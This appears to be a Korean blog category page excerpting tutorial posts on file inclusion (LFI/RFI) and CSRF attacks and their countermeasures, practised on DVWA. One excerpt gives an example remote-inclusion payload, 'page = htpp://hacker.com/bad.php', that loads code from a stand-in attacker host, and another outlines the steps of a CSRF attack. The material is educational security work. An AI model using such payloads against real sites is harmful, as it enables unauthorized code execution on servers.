728x90 해킹/웹해킹12 파일 인클루젼 공격대응 파일 인클루젼 공격대응 방안을 알아보겠습니다. 파일 인클루젼을 모르시는 분은 아래 포스팅을 봐주세요! https://com24everyday.tistory.com/36 파일 인클루젼 공격 안녕하세요. 오늘은 파일 인클루젼 공격에 대해 알아보겠습니다. 파일 인클루젼 공격은 주로 PHP Application 에서 발생합니다. 그 이유는 PHP include() 로 앱 요청을 지정할 수 있다면 파일을 직접 소스코드에.. com24everyday.tistory.com DVWA 보안을 'impossible'단계로 바꿉니다. 패스 트래버셜 공격이 실패한 것을 볼 수 있습니다. 소스코드를 확인해보겠습니다. 꼭 필요한 파일이 아니면 모조리 에러가 발생하도록 하고 있습니다. 가장 좋은 경우는 사용자 입력을 통해 파일이 .. 2020. 5. 4. 파일 인클루젼 공격 안녕하세요. 오늘은 파일 인클루젼 공격에 대해 알아보겠습니다. 파일 인클루젼 공격은 주로 PHP Application 에서 발생합니다. 그 이유는 PHP include() 로 앱 요청을 지정할 수 있다면 파일을 직접 소스코드에 삽입할 수 있기 때문입니다. -로컬파일인클루젼(LFI) : 웹 서버에 이미 존재하고 있는 파일을 인클루드 -리모트파일인클루젼(RFI) : LFI 보다 더 강력한 공격으로 원격으로 외부에 있는 파일을 인클루드 정상적 웹 사이트 page=file.php 이렇게 파일을 인클루드 하는데 해커는 자신의 사이트를 통해 page = htpp://hacker.com/bad.php 인클루드 시켜버립니다. 만약 검사를 따로 하지 않는다면 웹 사이트는 그대로 악성코드를 실행시키게 되는 겁니다. 이제 .. 2020. 5. 4. CSRF 공격대응 만약 CSRF 를 모르신다면 https://com24everyday.tistory.com/34 CSRF공격 오늘은 CSRF 공격에 대해 배워보겠습니다. CSRF는 Cross Site Request Forgery 의 약자로 사이트 간 요청 위조로 해커들이 피싱을 활용하여 사용자 모르게 패스워드를 변경하거나 하는 공격기법입니다. 피 com24everyday.tistory.com 포스팅을 보고 와주세요! 보안 단계를 impossible 로 바꿔 주세요. 보면 현재 패스워드를 추가입력해야합니다. 이러면 해커가 기본의 패스워드를 알고 있지 않은 한 공격을 할 수 없습니다. CSRF에 가장 좋은 대응 책은 이와 같이 주요한 기능에는 현재 패스워드 추가 입력을 한다거나 CAPTCHA 같은 것을 이용해서 사용자가 직접.. 2020. 5. 3. CSRF공격 오늘은 CSRF 공격에 대해 배워보겠습니다. CSRF는 Cross Site Request Forgery 의 약자로 사이트 간 요청 위조로 해커들이 피싱을 활용하여 사용자 모르게 패스워드를 변경하거나 하는 공격기법입니다. 피싱이라는 것은 사회 공학 기법 중 하나로 이메일이나 게시판을 이용해 은행이나 대기업인 척 하면서 사용자들을 낚는 것 입니다. 옥션 해킹 사건에서 이용된 공격이기도 합니다. CSRF 공격 단계 1. 정상 접송 및 로그인 2. 해커의 피싱 (ex : 클릭하여 보안 강화 바랍니다.) 3. 패스워드 변경 요청 (사용자도 모르게 패스워드 변경) 4. 변경된 패스워드로 접속 피싱만 하면 난이도 자체는 쉬운 공격에 속합니다. 하지만 피싱을 당할때 사용자가 로그인이 되어 있어야합니다. 요즘 같은 경우.. 2020. 5. 3. 이전 1 2 3 다음 728x90